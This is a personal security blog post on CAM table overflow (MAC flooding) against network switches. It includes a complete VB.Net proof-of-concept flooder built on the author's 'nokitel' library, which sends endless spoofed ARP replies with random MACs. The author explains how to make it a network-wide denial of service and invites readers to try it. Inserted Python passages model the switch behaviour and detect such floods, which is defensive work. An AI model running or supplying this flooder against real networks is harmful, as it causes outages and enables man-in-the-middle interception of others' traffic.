CAM Table Overflow
Here comes another example on how nokitel can be used for penetration testing.
Ever heard about a CAM-Table-Overflow?
Thought so.
It's not a very common exploitation method.
This is a short description quoted from hakipedia.com:
"A switch's CAM table contains network information such as MAC addresses available on physical switch ports and associated VLAN parameters. CAM Table Overflows occur when an influx of MAC addresses are flooded into the table and the CAM table threshold is reached. This causes the switch to act like a hub, flooding the network with traffic out all ports. The flooding caused by a CAM Table Overflow is limited to the source VLAN, thus does not affect other VLANs on the network."
In short, a CAM-Table-Overflow against a switch results in a "degradation of service".
The switch gets downgraded into a hub, and stays that way as long as the CAM-table keeps being overflowed.
If the MAC-flood stops, the degradation will stop as well after a short period of time.
It will eventually turn back into a fully operational mode due to nifty timeouts.
So what's this "degradation of service" good for?
Well, a normal switch forwards each frame only out of the port where it learned the destination MAC. Period.
A hub (which the attack makes the switch turn into) broadcasts all traffic to every physical port.
And what's so bad about that?
You got it. MITM! (Man-In-The-Middle)
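The behaviour described above (table fills, unknown destinations get flooded, timeouts restore normal forwarding) can be reproduced in a toy model of a learning switch. This is an added example, not code from the original post: the capacity, aging time and host addresses are assumed values, and the optional per-port MAC limit models what switch vendors call port security.

```python
CAPACITY = 8            # assumed; real CAM tables hold thousands of entries
AGING_SECONDS = 300     # assumed idle timeout for a learned entry

class Switch:
    def __init__(self, ports, max_macs_per_port=None):
        self.ports = set(ports)
        self.cam = {}                         # MAC -> (port, last_seen)
        self.limit = max_macs_per_port        # None models a switch without a per-port limit
        self.dropped = 0

    def receive(self, port, src, dst, now):
        """Process one frame and return the set of ports it is sent out of."""
        # Age out idle entries first; this is why the table recovers once a flood stops.
        self.cam = {m: (p, t) for m, (p, t) in self.cam.items() if now - t < AGING_SECONDS}
        known = src in self.cam
        on_port = sum(1 for p, _ in self.cam.values() if p == port)
        if not known and self.limit is not None and on_port >= self.limit:
            self.dropped += 1                 # per-port limit reached: drop, do not learn
            return set()
        if known or len(self.cam) < CAPACITY:
            self.cam[src] = (port, now)       # learn or refresh
        if dst in self.cam:
            return {self.cam[dst][0]}         # known unicast leaves on one port
        return self.ports - {port}            # unknown destination is flooded, hub-style

HOST_A, HOST_B = "02:00:00:00:0a:01", "02:00:00:00:0b:01"   # constructed addresses

def scenario(limit):
    """Port 4 presents 20 unseen source MACs, then A (port 1) talks to B (port 2)."""
    sw = Switch([1, 2, 3, 4], max_macs_per_port=limit)
    for i in range(20):
        sw.receive(4, f"02:00:00:00:ff:{i:02x}", "ff:ff:ff:ff:ff:ff", now=0)
    sw.receive(2, HOST_B, HOST_A, now=1)
    during = sw.receive(1, HOST_A, HOST_B, now=2)
    sw.receive(2, HOST_B, HOST_A, now=400)    # entries from t=0 have aged out by now
    after = sw.receive(1, HOST_A, HOST_B, now=401)
    return during, after, sw.dropped
```

Without a limit, A's frame to B leaves on every other port while the table is full and on port 2 only once the entries have aged out; with a limit of two MACs per port the table never fills and the frame stays on port 2 throughout.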

[Image: CAM-Table-Overflow, from Hakipedia.com]
The cool thing about this attack is that the affected devices (boxes, printers, other routers, etc.) won't get their ARP-caches tampered with.
Which in turn, lowers the risk of firewalls noticing.
Clever huh?
...And here comes the PoC, written in VB.Net with the use of the nokitel library:
Imports nokitel.PCAP 'Make sure your project is running .NET 3.5; and add a reference to nokitel.dll.

Module ARP_CAM_Table_Overflow
    Private NIC As Adapters.Adapter = Nothing 'The NIC you will send from.
    Private Adapters As New Adapters 'An instance of the NIC enumeration.

    Sub Main()
        ShowNICs()
        ChooseNIC()
        Console.WriteLine("! FF:FF:FF:FF:FF:FF, is the broadcast MAC-address.")
        Dim Target As String = vbNullString
        Do
            Console.WriteLine("< Enter the targets MAC:")
            Console.Write("> ")
            Target = Console.ReadLine
        Loop Until nokitel.Format.RegexMatch(Target, "^(([A-F0-9]){2}:){5}([A-F0-9]){2}$")
        Dim Threshold As Integer = &H0
        Do
            Console.WriteLine("< Enter the numeric timeout in milliseconds:")
            Console.Write("> ")
            Dim Dummy As String = Console.ReadLine
            If IsNumeric(Dummy) Then
                Threshold = CInt(Dummy)
                Exit Do
            End If
        Loop
        Dim Ethernet As New nokitel.Parse.Ethernet.Ethernet
        Dim ARP As New nokitel.Parse.ARP.ARP
        Dim Payload(nokitel.Parse.ARP.OFFSET) As Byte
        Do
            With Ethernet
                .DestinationMAC = Target
                .SourceMAC = nokitel.Format.RandomMAC
                .Type = nokitel.Parse.Ethernet.Ethernet_Types.ARP
            End With
            With ARP
                .HardwareType = nokitel.Parse.ARP.HardwareType.Ethernet
                .Operation = nokitel.Parse.ARP.OPCODES.Reply
                .ProtocolAddressLength = &H4 'IPv4 Length (4 bytes).
                .HardwareAddressLength = &H6 'MAC-address Length (6 bytes).
                .ProtocolType = nokitel.Parse.ARP.ProtocolType.IP
                .SenderHardwareAddress = nokitel.Format.RandomMAC
                .SenderProtocolAddress = nokitel.Format.RandomIP
                .TargetHardwareAddress = nokitel.Format.RandomMAC
                .TargetProtocolAddress = nokitel.Format.RandomIP
            End With
            nokitel.Parse.Ethernet.Make(Payload, Ethernet)
            nokitel.Parse.ARP.Make(Payload, ARP)
            NIC.Send(Payload)
            If Threshold > &H0 Then System.Threading.Thread.Sleep(Threshold)
        Loop
    End Sub

    Private Sub ShowNICs()
        For Index As Integer = &H0 To Adapters.Enumurate.Length - &H1 'Loop through all available NIC's, and display their stats:
            With Adapters.Enumurate(Index)
                Console.WriteLine("* ID: " & Index)
                Console.WriteLine("* Name: " & .Name)
                Console.WriteLine("* Description: " & .Description)
                Console.WriteLine("* GUID: " & .GUID)
                Console.WriteLine("* Netmask: " & .Netmask)
                Console.WriteLine("* Destination: " & .DestinationAddress)
                Console.WriteLine("* Broadcast: " & .BroadcastAddress)
                Console.WriteLine("* IP: " & .IP)
                Console.WriteLine("* MAC: " & .MAC)
                Console.WriteLine("* Gateway IP: " & .GatewayIP)
                Console.WriteLine("* Gateway MAC: " & .GatewayMAC)
                Console.WriteLine("* Supports WiFi: " & CStr(If(.IsWIFI, "Yes", "No")) & ".")
            End With
            Console.WriteLine()
        Next
    End Sub

    Private Sub ChooseNIC()
        Dim ID As String = vbNullString
        Do
            Console.Write("> ")
            ID = Console.ReadLine
            If IsNumeric(ID) Then
                If ID >= &H0 And ID < Adapters.Enumurate.Length Then
                    NIC = Adapters.Enumurate(ID) 'Set the NIC-variable to the corresponding index from the "ShowNICs()" output.
                    If Not NIC.Open(, False) Then
                        Console.WriteLine("x Unable to hook device!")
                        End
                    End If
                    Exit Do
                End If
            End If
        Loop
    End Sub
End Module
There you go!
A precompiled library can be downloaded from here. (Don't forget to set the "target MAC-address" to the switch's!)
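Seen from the monitoring side, the PoC above leaves two marks on the wire: every frame carries a never-before-seen source MAC, and because `SourceMAC` and `SenderHardwareAddress` are filled by separate `RandomMAC` calls, the ARP sender address does not match the Ethernet source of the same frame. The Python detector below is an added example (not part of the original post or of nokitel); its thresholds, alert names and sample frames are constructed for illustration, and the mismatch check is a heuristic rather than proof.

```python
import struct
from collections import deque

ETH_ARP, ARP_REPLY = 0x0806, 2
WINDOW_MS, MAX_NEW_MACS = 1000, 5        # assumed thresholds; tune per segment

def parse(frame):
    """Return (eth_src, arp_opcode, arp_sender_mac); ARP fields are None for non-ARP frames."""
    if len(frame) < 14:
        raise ValueError("truncated Ethernet header")
    src = frame[6:12]
    if struct.unpack("!H", frame[12:14])[0] != ETH_ARP or len(frame) < 42:
        return src, None, None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):   # Ethernet/IPv4 ARP only
        return src, None, None
    return src, op, frame[22:28]

def analyse(capture):
    """capture: iterable of (timestamp_ms, raw_frame). Returns [(timestamp_ms, alert), ...]."""
    alerts, seen, recent, flooding = [], set(), deque(), False
    for ts, frame in capture:
        src, op, sha = parse(frame)
        if op == ARP_REPLY and sha != src:
            alerts.append((ts, "arp-sender-mismatch"))
        if src not in seen:                   # first sighting of this source MAC
            seen.add(src)
            recent.append(ts)
        while recent and ts - recent[0] > WINDOW_MS:
            recent.popleft()
        over = len(recent) > MAX_NEW_MACS
        if over and not flooding:             # alert once per burst, not once per frame
            alerts.append((ts, "new-mac-burst"))
        flooding = over
    return alerts

def arp(src, op, sha):
    """Build a constructed sample frame (broadcast destination, zeroed IP fields)."""
    hdr = struct.pack("!HHHBBH", ETH_ARP, 1, 0x0800, 6, 4, op)
    return b"\xff" * 6 + src + hdr + sha + bytes(4) + bytes(6) + bytes(4)

def mac(n):
    return bytes([0x02, 0, 0, 0, 0, n])

# Constructed capture: two consistent ARP frames, then eight mismatched replies within 80 ms.
SAMPLE = [(0, arp(mac(1), 1, mac(1))), (500, arp(mac(2), ARP_REPLY, mac(2)))]
SAMPLE += [(2000 + 10 * i, arp(mac(16 + i), ARP_REPLY, mac(128 + i))) for i in range(8)]
```

On a real network the same logic would run over frames from a SPAN port or a capture file, with the new-MAC threshold set from the normal churn of that segment.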

I might add: if you set the threshold to 0 and enter the MAC-address "FF:FF:FF:FF:FF:FF" (Broadcast), it will turn into a devastating DoS (Denial of Service).
When I first coded this, I let Kasper try it out.
...And to put it short, it killed his whole network.
The Microsoft Windows Vista boxes in his network got null-routed, even after a few reboots and cleared ARP-caches.
...so did his TV.
Enough of this now!
It would be cool if you tried tinkering around with it!
That's about it!
Ciao.

Hey, I'm Fredrik. I'm from Sweden, born 1990, and I have a huge interest in information technology and information security. So far, I've been studying for three years at the International IT College of Sweden and one year at the Royal Institute of Technology (Kista, Sweden). I'm currently working at Young / Skilled and as a shareholder of Arctic Security. If you wish to contact me, please email me at h@ackack.net or follow me on Twitter @Almroot.